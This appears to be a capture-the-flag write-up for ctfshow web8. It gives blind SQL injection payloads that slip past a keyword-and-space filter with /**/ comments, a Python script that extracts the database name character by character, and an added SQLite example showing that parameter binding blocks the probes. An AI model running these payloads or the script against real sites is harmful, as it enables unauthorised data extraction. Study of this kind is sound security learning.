ctfshowWP

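All future ctfshow write-ups will be collected here.

ctfshow web8

This is a SQL injection challenge, but many things are filtered: the usual and, union, and spaces. True and false can still be told apart, and the injection carried out, with:

```
GET /index.php?id=2/**/or/**/true#
GET /index.php?id=2/**/or/**/false#
```

Blind injection is needed, using the ascii function. The principle is comparison:

```
or/**/ascii(substr(database()from/**/1/**/for/**/1))=ascii(substr(database()from/**/1/**/for/**/1))%23
```

This takes the first character of the current database name and compares it with itself. Many articles are returned, which shows the condition evaluated to true, so the approach works.

Code to query the current database:

```python
import requests


def check_id(id_value, position):
    # position increments one character at a time
    # (an HTTP client does not transmit the trailing "#"; it is treated as a URL fragment)
    url = f"https://df8032cd-0662-449d-bb7d-7ccd15eb9c62.challenge.ctf.show/index.php?id=-1/**/or/**/ascii(substr(database()from/**/{position}/**/for/**/1))={id_value}#"
    response = requests.get(url, verify=False)
    # A response body longer than 403 bytes means the comparison was true
    if len(response.content) > 403:
        ascii_value = chr(id_value)
        return ascii_value
    return None


def main():
    inp = ""
    # Positions to query; a for loop also terminates when no character matches
    for position in range(1, 6):
        for i in range(0, 128):  # iterate over the ASCII codes
            result = check_id(i, position)
            if result is not None:
                inp += result
                print(f"Position: {position}, ASCII: {result}")
                break
    print(f"Final input: {inp}")


if __name__ == "__main__":
    main()
```

The database name found is web8 ...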
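Why the and/union/space blacklist described above does not stop this injection, and what does, shown as an added example that is not part of the original write-up. It uses an in-memory SQLite table in place of the challenge's database; the table, function names and filter regex are assumptions.

```python
import re
import sqlite3

def make_db():
    # Constructed stand-in for the challenge's article table (names are assumptions).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO article VALUES (?, ?)",
                   [(1, "first"), (2, "second"), (3, "third")])
    return db

# Blacklist as the write-up describes it: and, union and whitespace are rejected.
BLACKLIST = re.compile(r"and|union|\s", re.IGNORECASE)

def lookup_blacklist(db, raw_id):
    """Before: filter the string, then concatenate it into the SQL text."""
    if BLACKLIST.search(raw_id):
        return []
    # The value is still parsed as SQL, so comments and OR pass straight through.
    return db.execute("SELECT title FROM article WHERE id = " + raw_id).fetchall()

def lookup_hardened(db, raw_id):
    """After: accept only ASCII decimal digits and bind the value as a parameter."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []
    return db.execute("SELECT title FROM article WHERE id = ?",
                      (int(raw_id),)).fetchall()

# Constructed inputs: a normal id and the true/false probes quoted above.
# 1=1 and 1=0 stand in for true/false; the MySQL-only trailing # is left out.
SAMPLES = ["2", "2/**/or/**/1=1", "2/**/or/**/1=0"]

def compare(db):
    """Row counts per input as (blacklist version, hardened version)."""
    return {s: (len(lookup_blacklist(db, s)), len(lookup_hardened(db, s)))
            for s in SAMPLES}

if __name__ == "__main__":
    for sample, (before, after) in compare(make_db()).items():
        print(f"{sample!r}: blacklist={before} rows, hardened={after} rows")
```

The differing row counts for the two probes in the blacklist version are the true/false signal the write-up relies on; with strict validation and a bound parameter both probes return nothing.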

September 16, 2024 · 2 min · 316 words · neko